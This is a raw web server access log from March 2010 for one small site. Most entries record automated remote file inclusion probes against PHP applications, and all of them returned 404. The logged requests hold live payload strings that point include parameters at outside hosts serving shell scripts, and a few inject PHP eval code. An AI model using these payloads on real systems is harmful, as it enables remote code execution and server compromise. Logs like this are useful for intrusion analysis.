66.7.205.103 - - [08/Mar/2010:07:16:35 -0800] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
69.16.237.166 - - [08/Mar/2010:07:20:47 -0800] "GET /logs/access.log//gnuboard4/bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
69.16.237.166 - - [08/Mar/2010:07:20:47 -0800] "GET /gnuboard4/bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
69.16.237.166 - - [08/Mar/2010:07:20:47 -0800] "GET /logs//gnuboard4/bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.144.12.142 - - [08/Mar/2010:07:22:33 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://boats.uksi.ru/sh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.144.12.142 - - [08/Mar/2010:07:22:33 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://boats.uksi.ru/sh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.144.12.142 - - [08/Mar/2010:07:22:33 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://boats.uksi.ru/sh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:23:01 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:23:01 -0800] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.7.205.103 - - [08/Mar/2010:07:23:01 -0800] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.144.12.142 - - [08/Mar/2010:07:26:57 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://boats.uksi.ru/sh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.144.12.142 - - [08/Mar/2010:07:26:57 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://boats.uksi.ru/sh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.144.12.142 - - [08/Mar/2010:07:26:57 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://boats.uksi.ru/sh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:07:30:40 -0800] "GET /logs/access.log%20%20/delete_comment.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
121.88.4.74 - - [08/Mar/2010:07:30:40 -0800] "GET /delete_comment.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
121.88.4.74 - - [08/Mar/2010:07:30:40 -0800] "GET /logs/delete_comment.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.234.201.2 - - [08/Mar/2010:07:39:48 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.234.201.2 - - [08/Mar/2010:07:39:48 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.234.201.2 - - [08/Mar/2010:07:39:48 -0800] "GET /include/admin.lib.inc.php?site_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.123.194 - - [08/Mar/2010:07:50:55 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [08/Mar/2010:07:59:48 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:08:01:33 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:04:09 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:04:09 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:04:12 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.234.201.2 - - [08/Mar/2010:08:07:03 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:28 -0800] "GET //write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:28 -0800] "GET /logs/access.log%20%20///write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:28 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:28 -0800] "GET //write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:28 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:28 -0800] "GET /logs/access.log%20%20///write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:31 -0800] "GET //write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:31 -0800] "GET /logs/access.log%20%20///write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:31 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:37 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:37 -0800] "GET //write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:08:13:37 -0800] "GET /logs/access.log%20%20///write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:19:29 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:19:29 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:19:29 -0800] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.234.201.2 - - [08/Mar/2010:08:30:02 -0800] "GET /bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.234.201.2 - - [08/Mar/2010:08:30:02 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.234.201.2 - - [08/Mar/2010:08:30:02 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:08:31:02 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:08:31:03 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:08:31:03 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
121.88.4.74 - - [08/Mar/2010:08:32:06 -0800] "GET /logs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:08:32:06 -0800] "GET /logs/access.log/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:08:32:06 -0800] "GET /poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:08:33:38 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:37:35 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:37:35 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:37:35 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:40:20 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:40:20 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:08:40:20 -0800] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:08:41:01 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
110.45.145.178 - - [08/Mar/2010:08:41:01 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
110.45.145.178 - - [08/Mar/2010:08:41:02 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
118.129.166.154 - - [08/Mar/2010:08:45:58 -0800] "GET /logs//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:08:45:59 -0800] "GET /logs/access.log//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:08:45:59 -0800] "GET /bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.205 - - [08/Mar/2010:08:48:07 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.234.201.2 - - [08/Mar/2010:08:54:30 -0800] "GET /delete_all.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.234.201.2 - - [08/Mar/2010:08:54:30 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.234.201.2 - - [08/Mar/2010:08:54:30 -0800] "GET /logs//delete_all.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:08:56:45 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.109.127.201 - - [08/Mar/2010:09:24:27 -0800] "GET /logs/access.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.109.127.201 - - [08/Mar/2010:09:24:28 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.109.127.201 - - [08/Mar/2010:09:24:28 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
110.45.145.178 - - [08/Mar/2010:09:25:18 -0800] "GET /logs/access_091012.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:09:25:19 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:09:25:19 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
213.251.189.201 - - [08/Mar/2010:09:28:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.redneckmba.com"
213.251.189.201 - - [08/Mar/2010:09:28:05 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.redneckmba.com"
208.80.193.38 - - [08/Mar/2010:09:28:31 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; PeoplePal 3.0; Windows-Media-Player/10.00.00.3990)" "www.redneckmba.com"
76.13.123.194 - - [08/Mar/2010:09:34:11 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
116.40.122.117 - - [08/Mar/2010:09:35:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
116.40.122.117 - - [08/Mar/2010:09:35:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
116.40.122.117 - - [08/Mar/2010:09:35:20 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.205 - - [08/Mar/2010:09:36:11 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:09:36:33 -0800] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:09:36:33 -0800] "GET /logs/access.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:09:36:33 -0800] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:09:36:41 -0800] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:09:36:41 -0800] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
85.119.152.183 - - [08/Mar/2010:09:36:41 -0800] "GET /logs/access.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:09:47:40 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:09:47:40 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.166.154 - - [08/Mar/2010:09:47:40 -0800] "GET /logs/access.log//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:49:38 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:49:38 -0800] "GET /logs/access.log%20%20//bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:49:38 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:49:54 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:49:54 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:49:54 -0800] "GET /logs/access.log%20%20//bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [08/Mar/2010:09:51:18 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:54:22 -0800] "GET /logs/access.log%20%20//bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:54:22 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:54:22 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:54:38 -0800] "GET /logs/access.log%20%20//bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:54:38 -0800] "GET /bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:09:54:38 -0800] "GET /logs//bbs//////////good.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.201 - - [08/Mar/2010:09:57:17 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.redneckmba.com"
213.251.189.201 - - [08/Mar/2010:09:57:17 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:09:59:01 -0800] "GET /logs///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:09:59:01 -0800] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:09:59:07 -0800] "GET /logs/access_100104.log///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.251.189.201 - - [08/Mar/2010:09:59:44 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "redneckmba.com"
213.251.189.201 - - [08/Mar/2010:09:59:44 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:10:00:13 -0800] "GET /logs///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:10:00:13 -0800] "GET /logs/access.log///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.227.136.138 - - [08/Mar/2010:10:00:13 -0800] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
